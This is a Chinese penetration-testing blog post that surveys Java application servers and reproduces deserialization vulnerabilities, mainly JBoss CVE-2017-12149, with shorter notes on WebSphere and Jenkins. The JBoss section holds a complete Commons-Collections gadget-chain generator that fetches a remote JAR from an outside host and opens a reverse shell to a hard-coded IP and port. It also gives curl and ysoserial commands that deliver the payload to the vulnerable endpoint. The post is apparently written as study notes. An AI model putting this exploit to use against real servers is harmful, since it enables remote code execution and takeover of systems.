<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang="zh-CN">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/128x128.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/32x32.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/16x16.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="代码审计,">










<meta name="description" content="常用容器： Tomcat/Jetty/Resin/JBoss/WebSphere/WebLogic Tomcat 服务器目前最为流行的Tomcat服务器是Apache开源项目中的一个子项目，是一个小型、轻量级的支持JSP和Servlet 技术的Web服务器，也是初学者学习开发JSP应用的首选。 在Tomcat中，应用程序的部署很简单，你只需将你的WAR放到Tomcat的webapp目录下，Tomc">
<meta name="keywords" content="代码审计">
<meta property="og:type" content="article">
<meta property="og:title" content="JAVA相关容器序列化漏洞学习">
<meta property="og:url" content="http://laker.xyz/2020/01/08/JAVA相关容器序列化漏洞学习/index.html">
<meta property="og:site_name" content="laker&#39;s Blog">
<meta property="og:description" content="常用容器： Tomcat/Jetty/Resin/JBoss/WebSphere/WebLogic Tomcat 服务器目前最为流行的Tomcat服务器是Apache开源项目中的一个子项目，是一个小型、轻量级的支持JSP和Servlet 技术的Web服务器，也是初学者学习开发JSP应用的首选。 在Tomcat中，应用程序的部署很简单，你只需将你的WAR放到Tomcat的webapp目录下，Tomc">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="http://laker.xyz/2020/01/08/JAVA相关容器序列化漏洞学习/1578453879948.png">
<meta property="og:image" content="http://laker.xyz/2020/01/08/JAVA相关容器序列化漏洞学习/1578453975962.png">
<meta property="og:image" content="http://laker.xyz/2020/01/08/JAVA相关容器序列化漏洞学习/1578454312436.png">
<meta property="og:image" content="http://laker.xyz/2020/01/08/JAVA相关容器序列化漏洞学习/1578455920447.png">
<meta property="og:image" content="http://laker.xyz/2020/01/08/JAVA相关容器序列化漏洞学习/1578456393323.png">
<meta property="og:image" content="http://laker.xyz/2020/01/08/JAVA相关容器序列化漏洞学习/1578456411149.png">
<meta property="og:image" content="http://laker.xyz/2020/01/08/JAVA相关容器序列化漏洞学习/1578457696972.png">
<meta property="og:image" content="http://laker.xyz/2020/01/08/JAVA相关容器序列化漏洞学习/1578462319136.png">
<meta property="og:image" content="http://laker.xyz/2020/01/08/JAVA相关容器序列化漏洞学习/1578462650084.png">
<meta property="og:image" content="http://laker.xyz/2020/01/08/JAVA相关容器序列化漏洞学习/1578462690645.png">
<meta property="og:image" content="http://laker.xyz/2020/01/08/JAVA相关容器序列化漏洞学习/1578463602922.png">
<meta property="og:image" content="http://laker.xyz/2020/01/08/JAVA相关容器序列化漏洞学习/1578463627741.png">
<meta property="og:image" content="http://laker.xyz/2020/01/08/JAVA相关容器序列化漏洞学习/1578482472280.png">
<meta property="og:image" content="http://laker.xyz/2020/01/08/JAVA相关容器序列化漏洞学习/1578486370688.png">
<meta property="og:image" content="http://laker.xyz/2020/01/08/JAVA相关容器序列化漏洞学习/1578488828260.png">
<meta property="og:image" content="http://laker.xyz/2020/01/08/JAVA相关容器序列化漏洞学习/1578488844395.png">
<meta property="og:updated_time" content="2020-01-13T06:32:22.404Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="JAVA相关容器序列化漏洞学习">
<meta name="twitter:description" content="常用容器： Tomcat/Jetty/Resin/JBoss/WebSphere/WebLogic Tomcat 服务器目前最为流行的Tomcat服务器是Apache开源项目中的一个子项目，是一个小型、轻量级的支持JSP和Servlet 技术的Web服务器，也是初学者学习开发JSP应用的首选。 在Tomcat中，应用程序的部署很简单，你只需将你的WAR放到Tomcat的webapp目录下，Tomc">
<meta name="twitter:image" content="http://laker.xyz/2020/01/08/JAVA相关容器序列化漏洞学习/1578453879948.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://laker.xyz/2020/01/08/JAVA相关容器序列化漏洞学习/">





  <title>JAVA相关容器序列化漏洞学习 | laker's Blog</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-CN">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">laker's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">记录渗透测试琐事仅仅</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            Categories
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            About
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://laker.xyz/2020/01/08/JAVA相关容器序列化漏洞学习/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="laker">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="laker's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">JAVA相关容器序列化漏洞学习</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2020-01-08T19:26:37+08:00">
                2020-01-08
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>常用容器：</p>
<p>Tomcat/Jetty/Resin/JBoss/WebSphere/WebLogic</p>
<h4 id="Tomcat-服务器"><a href="#Tomcat-服务器" class="headerlink" title="Tomcat 服务器"></a>Tomcat 服务器</h4><p>目前最为流行的Tomcat服务器是Apache开源项目中的一个子项目，是一个小型、轻量级的支持JSP和Servlet 技术的Web服务器，也是初学者学习开发JSP应用的首选。</p>
<p>在Tomcat中，应用程序的部署很简单，你只需将你的WAR放到Tomcat的webapp目录下，Tomcat会自动检测到这个文件，并将其解压。你在浏览器中访问这个应用的Jsp时，通常第一次会很慢，因为Tomcat要将Jsp转化为Servlet文件，然后编译。编译以后，访问将会很快。另外Tomcat也提供了一个应用：manager，访问这个应用需要用户名和密码，用户名和密码存储在一个xml文件中。</p>
<p>Tomcat不仅仅是一个Servlet容器，它也具有传统的Web服务器的功能：处理Html页面。但是与Apache相比，它的处理静态Html的能力就不如Apache。</p>
<h5 id="Jetty"><a href="#Jetty" class="headerlink" title="Jetty"></a>Jetty</h5><p>Jetty 目前的是一个比较被看好的 Servlet 引擎，它的架构比较简单，也是一个可扩展性和非常灵活的应用服务器。</p>
<p>虽然 Jetty 正常成长为一个优秀的 Servlet 引擎，但是目前的 Tomcat 的地位仍然难以撼动。相比较来看，它们都有各自的优点与缺点。</p>
<p>①从架构上来说，显然 Jetty 比 Tomcat 更加简单。</p>
<p>②Tomcat 在处理少数非常繁忙的连接（连接的生命周期短）上更有优势。而 Jetty 刚好相反，Jetty 可以同时处理大量连接而且可以长时间保持这些连接。</p>
<h5 id="Resin-服务器"><a href="#Resin-服务器" class="headerlink" title="Resin 服务器"></a>Resin 服务器</h5><p>Resin是一个非常流行的支持Servlet和JSP的服务器，速度非常快。Resin本身包含了一个支持HTML的Web服务器，这使它不仅可以显示动态内容，而且显示静态内容的能力也毫不逊色，因此许多网站都是使用Resin服务器构建。</p>
<h5 id="JBoss服务器-–（曾有反序列化漏洞）"><a href="#JBoss服务器-–（曾有反序列化漏洞）" class="headerlink" title="JBoss服务器 –（曾有反序列化漏洞）"></a>JBoss服务器 –（曾有反序列化漏洞）</h5><p>Jboss作为Java EE应用服务器，它不但是Servlet容器，而且是EJB（Enterprise java bean）容器，速度慢一些，不适合开发阶段，可以用于真实运行环境（免费）。从而受到企业级开发人员的欢迎，从而弥补了Tomcat只是一个Servlet容器的缺憾。</p>
<p>JBoss六大优点：</p>
<p>JBoss是免费的，开放源代码J2EE的实现，它通过LGPL许可证进行发布。</p>
<p>JBoss需要的内存和硬盘空间比较小。</p>
<p>安装非常简单。先解压缩JBoss打包文件再配置一些环境变量就可以了。</p>
<p>JBoss能够”热部署”，部署BEAN只是简单拷贝BEAN的JAR文件到部署路径下就可以了。如果没有加载就加载它；如果已经加载了就卸载掉，然后LOAD这个新的。</p>
<p>JBoss与Web服务器在同一个Java虚拟机中运行，Servlet调用EJB不经过网络，从而大大提高运行效率，提升安全性能。</p>
<p>用户可以直接实施J2EE-EAR，而不是以前分别实施EJB-JAR和Web-WAR，非常方便。</p>
<h5 id="WebSphere-服务器-–（曾有反序列化漏洞）"><a href="#WebSphere-服务器-–（曾有反序列化漏洞）" class="headerlink" title="WebSphere 服务器 –（曾有反序列化漏洞）"></a>WebSphere 服务器 –（曾有反序列化漏洞）</h5><p>　　WebSphere是IBM公司的产品，可进一步细分为 WebSphere Performance Pack、Cache Manager 和WebSphere Application Server等系列，其中WebSphere Application Server 是基于Java 的应用环境，可以运行于 Sun Solaris、Windows NT 等多种操作系统平台，用于建立、部署和管理Internet和Intranet Web应用程序。</p>
<h5 id="WebLogic-服务器-–（曾有反序列化漏洞）"><a href="#WebLogic-服务器-–（曾有反序列化漏洞）" class="headerlink" title="WebLogic 服务器 –（曾有反序列化漏洞）"></a>WebLogic 服务器 –（曾有反序列化漏洞）</h5><p>　　WebLogic 可进一步细分为 WebLogic Server、WebLogic Enterprise 和 WebLogic Portal 等系列，其中 WebLogic Server 的功能特别强大。WebLogic 支持企业级的、多层次的和完全分布式的Web应用，并且服务器的配置简单、界面友好。对于那些正在寻求能够提供Java平台所拥有的一切应用服务器的用户来说，WebLogic是一个十分理想的选择。不适合开发阶段，太慢了，适合于运行环境（收费）。</p>
<h5 id="Jekin应用-–（曾有反序列化漏洞）-不是容器而是应用，可部署到容器"><a href="#Jekin应用-–（曾有反序列化漏洞）-不是容器而是应用，可部署到容器" class="headerlink" title="Jekin应用 –（曾有反序列化漏洞） 不是容器而是应用，可部署到容器"></a>Jekin应用 –（曾有反序列化漏洞） 不是容器而是应用，可部署到容器</h5><p>Jenkins功能包括：</p>
<p>1、持续的软件版本发布/测试项目。</p>
<p>2、监控外部调用执行的工作。</p>
<p><strong>第一种启动方法，切换到jenkins.war存放的目录，输入如下命令：</strong></p>
<blockquote>
<p>$ java -jar jenkins.war</p>
</blockquote>
<p>如果需要修改端口可以使用如下命令：</p>
<blockquote>
<p>$ java -jar jenkins.jar–httpPort=8081</p>
</blockquote>
<p>然后在<a href="https://baike.baidu.com/item/%E6%B5%8F%E8%A7%88%E5%99%A8/213911" target="_blank" rel="noopener">浏览器</a>中（推荐用<a href="https://baike.baidu.com/item/%E7%81%AB%E7%8B%90/2929317" target="_blank" rel="noopener">火狐</a>）输入localhost:8081，localhost可以是本机的ip，也可以是计算机名。就可以打开jenkins。</p>
<p><strong>第二种方法是用<a href="https://baike.baidu.com/item/tomcat/255751" target="_blank" rel="noopener">tomcat</a>打开</strong></p>
<p>解压tomcat到某个目录,如/usr/local，进入tomcat下的/bin目录，启动tomcat</p>
<p>将jenkins.war文件放入tomcat下的webapps目录下，启动tomcat时，会自动在webapps目录下建立jenkins目录，在地址栏上需要输入localhost:8080/jenkins。</p>
<hr>
<p>Jboss、Weblogic、Webphere、Jekins(非容器)</p>
<h1 id="Jboss"><a href="#Jboss" class="headerlink" title="Jboss"></a>Jboss</h1><h2 id="CVE-2017-12149"><a href="#CVE-2017-12149" class="headerlink" title="CVE-2017-12149"></a>CVE-2017-12149</h2><h3 id="影响的版本"><a href="#影响的版本" class="headerlink" title="影响的版本"></a>影响的版本</h3><p>5.x和6.x版本的JBOSSAS</p>
<h4 id="漏洞关联"><a href="#漏洞关联" class="headerlink" title="漏洞关联"></a>漏洞关联</h4><p>http-invoker.sar 组件、该组件衍生的url-pattern为  /invoker/readonly （Get方式500响应）</p>
<h5 id="复现"><a href="#复现" class="headerlink" title="复现"></a>复现</h5><p>下载jboss-6.1.0.Final（2011年发布，最新版已至2012发布7.1）</p>
<p><a href="https://jbossas.jboss.org/downloads/" target="_blank" rel="noopener">https://jbossas.jboss.org/downloads/</a></p>
<p>漏洞产生点：根据字义应是用来反射http请求包的一个附加组件。</p>
<p><img src="/2020/01/08/JAVA相关容器序列化漏洞学习/1578453879948.png" alt="1578453879948"></p>
<p>jboss-as-distribution-6.1.0.Final\jboss-6.1.0.Final\server\default\deploy\http-invoker.sar\invoker.war\WEB-INF\classes\org\jboss\invocation\http\servlet\ReadOnlyAccessFilter.class</p>
<p><img src="/2020/01/08/JAVA相关容器序列化漏洞学习/1578453975962.png" alt="1578453975962"></p>
<p>反序列化点</p>
<p><img src="/2020/01/08/JAVA相关容器序列化漏洞学习/1578454312436.png" alt="1578454312436"></p>
<p>修改server.xml</p>
<p><img src="/2020/01/08/JAVA相关容器序列化漏洞学习/1578455920447.png" alt="1578455920447"></p>
<p><img src="/2020/01/08/JAVA相关容器序列化漏洞学习/1578456393323.png" alt="1578456393323"></p>
<p><img src="/2020/01/08/JAVA相关容器序列化漏洞学习/1578456411149.png" alt="1578456411149"></p>
<p><a href="https://www.jianshu.com/p/db777d5b4513" target="_blank" rel="noopener">https://www.jianshu.com/p/db777d5b4513</a>一文提到一种</p>
<p>Win执行编译（Linux加.:）</p>
<blockquote>
<p>javac -cp commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java</p>
</blockquote>
<p>这里-cp用来指定依赖的jar包（ReverseShellCommonsCollectionsHashMap.java里引入了org.apache.commons.collections.*）</p>
<p>Win执行</p>
<blockquote>
<p>java -cp commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 120.79.91.29:9999</p>
</blockquote>
<p>原项目老报错、自己起了个demo:</p>
<p><img src="/2020/01/08/JAVA相关容器序列化漏洞学习/1578457696972.png" alt="1578457696972"></p>
<p><img src="/2020/01/08/JAVA相关容器序列化漏洞学习/1578462319136.png" alt="1578462319136"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl http://127.0.0.1:8080/invoker/readonly --data-binary @C:\Users\Administrator\IdeaProjects\untitled2\ReverseShellCommonsCollectionsHashMap.ser</span><br></pre></td></tr></table></figure>

<p><img src="/2020/01/08/JAVA相关容器序列化漏洞学习/1578462650084.png" alt="1578462650084"></p>
<p><img src="/2020/01/08/JAVA相关容器序列化漏洞学习/1578462690645.png" alt="1578462690645"></p>
<p>这里使用了一个curl命令：</p>
<blockquote>
<p>curl <a href="http://127.0.0.1:8080/invoker/readonly" target="_blank" rel="noopener">http://127.0.0.1:8080/invoker/readonly</a> –data-binary @C:\Users\Administrator\IdeaProjects\untitled2\ReverseShellCommonsCollectionsHashMap.ser</p>
</blockquote>
<p>这里@必须要、–data-binary指定二进制序列化数据。</p>
<p>分析一下序列化数据生成：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> org.apache.commons.collections.Transformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.ChainedTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.ConstantTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.InstantiateTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.InvokerTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.keyvalue.TiedMapEntry;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.map.LazyMap;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.io.*;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.*;</span><br><span class="line"><span class="keyword">import</span> java.net.URL;</span><br><span class="line"><span class="keyword">import</span> java.net.URLClassLoader;</span><br><span class="line"><span class="keyword">import</span> java.util.HashMap;</span><br><span class="line"><span class="keyword">import</span> java.util.HashSet;</span><br><span class="line"><span class="keyword">import</span> java.util.Map;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">Main</span> </span>&#123;</span><br><span class="line">    <span class="meta">@SuppressWarnings</span> ( &#123;<span class="string">"unchecked"</span>&#125; )</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception</span>&#123;</span><br><span class="line">        String remoteJar = <span class="string">"http://www.joaomatosf.com/rnp/java_files/JexRemoteTools.jar"</span>;</span><br><span class="line">        String host = <span class="keyword">null</span>;</span><br><span class="line">        <span class="keyword">int</span> port = <span class="number">1331</span>;</span><br><span class="line">        host = <span class="string">"120.79.91.29"</span>;</span><br><span class="line">        port = <span class="number">9999</span>;</span><br><span class="line">        Transformer[] transformers = <span class="keyword">new</span> Transformer[] &#123;</span><br><span class="line">                <span class="keyword">new</span> ConstantTransformer(URLClassLoader<span class="class">.<span class="keyword">class</span>),</span></span><br><span class="line"><span class="class">                <span class="title">new</span> <span class="title">InstantiateTransformer</span>(</span></span><br><span class="line">                        new Class[]&#123;URL[].class&#125;,</span><br><span class="line">                        <span class="keyword">new</span> Object[]&#123;<span class="keyword">new</span> URL[]&#123;<span class="keyword">new</span> URL(remoteJar)&#125;&#125;</span><br><span class="line">                ),</span><br><span class="line">                <span class="keyword">new</span> InvokerTransformer(<span class="string">"loadClass"</span>,</span><br><span class="line">                        <span class="keyword">new</span> Class[]&#123;String<span class="class">.<span class="keyword">class</span>&#125;,</span></span><br><span class="line">                        new Object[]&#123;"JexReverse"&#125;</span><br><span class="line">                ),</span><br><span class="line">                <span class="keyword">new</span> InstantiateTransformer(</span><br><span class="line">                        <span class="keyword">new</span> Class[]&#123;String<span class="class">.<span class="keyword">class</span>, <span class="title">int</span>.<span class="title">class</span>&#125;,</span></span><br><span class="line">                        new Object[]&#123;host, port&#125;</span><br><span class="line">                )</span><br><span class="line">        &#125;;<span class="comment">//构造恶意的反序列化数据</span></span><br><span class="line">        <span class="comment">//实例化包装类ChainedTransformer</span></span><br><span class="line">        Transformer transformerChain = <span class="keyword">new</span> ChainedTransformer(transformers);</span><br><span class="line">        <span class="comment">// 创建Map</span></span><br><span class="line">        Map map1 = <span class="keyword">new</span> HashMap();</span><br><span class="line">        <span class="comment">// 使用LazyMap包装类包装恶意类</span></span><br><span class="line">        Map lazyMap = LazyMap.decorate(map1,transformerChain);</span><br><span class="line">		<span class="comment">//实例化TiedMapEntry，修改toString方法到getValue（具体去看common-collections链）</span></span><br><span class="line">        TiedMapEntry entry = <span class="keyword">new</span> TiedMapEntry(lazyMap, <span class="string">"foo"</span>);</span><br><span class="line">        HashSet map = <span class="keyword">new</span> HashSet(<span class="number">1</span>);</span><br><span class="line">        map.add(<span class="string">"foo"</span>);</span><br><span class="line">        Field f = <span class="keyword">null</span>;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            f = HashSet.class.getDeclaredField("map");//反射</span><br><span class="line">        &#125; <span class="keyword">catch</span> (NoSuchFieldException e) &#123;</span><br><span class="line">            f = HashSet.class.getDeclaredField("backingMap");//反射</span><br><span class="line">        &#125;</span><br><span class="line">		<span class="comment">//设置反射访问度</span></span><br><span class="line">        f.setAccessible(<span class="keyword">true</span>);</span><br><span class="line">        HashMap innimpl = (HashMap) f.get(map);</span><br><span class="line">        Field f2 = <span class="keyword">null</span>;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            f2 = HashMap.class.getDeclaredField("table");</span><br><span class="line">        &#125; <span class="keyword">catch</span> (NoSuchFieldException e) &#123;</span><br><span class="line">            f2 = HashMap.class.getDeclaredField("elementData");</span><br><span class="line">        &#125;</span><br><span class="line">        f2.setAccessible(<span class="keyword">true</span>);</span><br><span class="line">        Object[] array = (Object[]) f2.get(innimpl);</span><br><span class="line">        Object node = array[<span class="number">0</span>];</span><br><span class="line">        <span class="keyword">if</span>(node == <span class="keyword">null</span>)&#123;</span><br><span class="line">            node = array[<span class="number">1</span>];</span><br><span class="line">        &#125;</span><br><span class="line">        Field keyField = <span class="keyword">null</span>;</span><br><span class="line">        <span class="keyword">try</span>&#123;</span><br><span class="line">            keyField = node.getClass().getDeclaredField(<span class="string">"key"</span>);</span><br><span class="line">        &#125;<span class="keyword">catch</span>(Exception e)&#123;</span><br><span class="line">            keyField = Class.forName(<span class="string">"java.util.MapEntry"</span>).getDeclaredField(<span class="string">"key"</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        keyField.setAccessible(<span class="keyword">true</span>);</span><br><span class="line">        <span class="comment">//反射修改并触发</span></span><br><span class="line">        keyField.set(node, entry);</span><br><span class="line">        <span class="comment">// 保存反序列化二进制数据</span></span><br><span class="line">        System.out.println(<span class="string">"Saving serialized object in ReverseShellCommonsCollectionsHashMap.ser"</span>);</span><br><span class="line">        </span><br><span class="line">        FileOutputStream fos = <span class="keyword">new</span> FileOutputStream(<span class="string">"ReverseShellCommonsCollectionsHashMap.ser"</span>);</span><br><span class="line">        ObjectOutputStream oos = <span class="keyword">new</span> ObjectOutputStream(fos);</span><br><span class="line">        oos.writeObject(map);</span><br><span class="line">        oos.flush();</span><br><span class="line">        </span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>需要commons-collections-3.2.1.jar  可在这里取：</p>
<p><a href="https://github.com/joaomatosf/JavaDeserH2HC" target="_blank" rel="noopener">https://github.com/joaomatosf/JavaDeserH2HC</a></p>
<p><strong>疑问</strong></p>
<p>为什么默认可用此链呢？</p>
<p>common-collections默认存在Jboss二进制包里：</p>
<p>commons-collections-3.2.1<img src="/2020/01/08/JAVA相关容器序列化漏洞学习/1578463602922.png" alt="1578463602922"></p>
<p><img src="/2020/01/08/JAVA相关容器序列化漏洞学习/1578463627741.png" alt="1578463627741"></p>
<p>如何使用ysoserial完成此攻击：</p>
<figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">java -jar ysoserial.jar CommonsCollections5 calc.exe &gt; CommonsCollections5.ser</span><br></pre></td></tr></table></figure>

<figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl http://<span class="number">127</span>.<span class="number">0</span>.<span class="number">0</span>.<span class="number">1</span>:<span class="number">8080</span>/invoker/readonly --data-binary @CommonsCollections5.ser</span><br></pre></td></tr></table></figure>

<p>亲测ysoserial生成的CommonsCollections3不能用。CommonsCollections5可用。符号@必须要。</p>
<p><img src="/2020/01/08/JAVA相关容器序列化漏洞学习/1578482472280.png" alt="1578482472280"></p>
<h1 id="WebSphere"><a href="#WebSphere" class="headerlink" title="WebSphere"></a>WebSphere</h1><h2 id="CVE-2015-7450"><a href="#CVE-2015-7450" class="headerlink" title="CVE-2015-7450"></a>CVE-2015-7450</h2><p><a href="https://www.cnblogs.com/ssooking/p/5875215.html" target="_blank" rel="noopener">https://www.cnblogs.com/ssooking/p/5875215.html</a></p>
<p>利用</p>
<p><a href="https://github.com/s0wr0b1ndef/Java_Deserialization_exploits/blob/c57412931a7b30153935ade295b2860306d8e14b/WebSphere/websphere_rce.py" target="_blank" rel="noopener">https://github.com/s0wr0b1ndef/Java_Deserialization_exploits/blob/c57412931a7b30153935ade295b2860306d8e14b/WebSphere/websphere_rce.py</a></p>
<p>漏洞影响Version8.0，Version7.0，Version8.5 and 8.5.5 Full Profile and Liberty Profile</p>
<p>临时解决方案<br>1 使用 SerialKiller 替换进行序列化操作的 ObjectInputStream 类；<br>2 在不影响业务的情况下，临时删除掉项目里的“org/apache/commons/collections/functors/InvokerTransformer.class” 文件</p>
<p>网上没找到该容器，IBM商用的。也没看着使用的url路径，只找到这个利用的py脚本，脚本也没提供路径。无语</p>
<h1 id="Jekins"><a href="#Jekins" class="headerlink" title="Jekins"></a>Jekins</h1><h2 id="CVE-2016-9299"><a href="#CVE-2016-9299" class="headerlink" title="CVE-2016-9299"></a>CVE-2016-9299</h2><h2 id="CVE-2017-1000353"><a href="#CVE-2017-1000353" class="headerlink" title="CVE-2017-1000353"></a>CVE-2017-1000353</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">影响低于 2.56 的所有 Jenkins 主线版本(包括 2.56 版本)</span><br><span class="line">影响低于 2.46.1 的所有 Jenkins LTS 版本 ( 包括 2.46.1 版本)</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">net start jenkins</span><br><span class="line">net stop jenkins</span><br></pre></td></tr></table></figure>

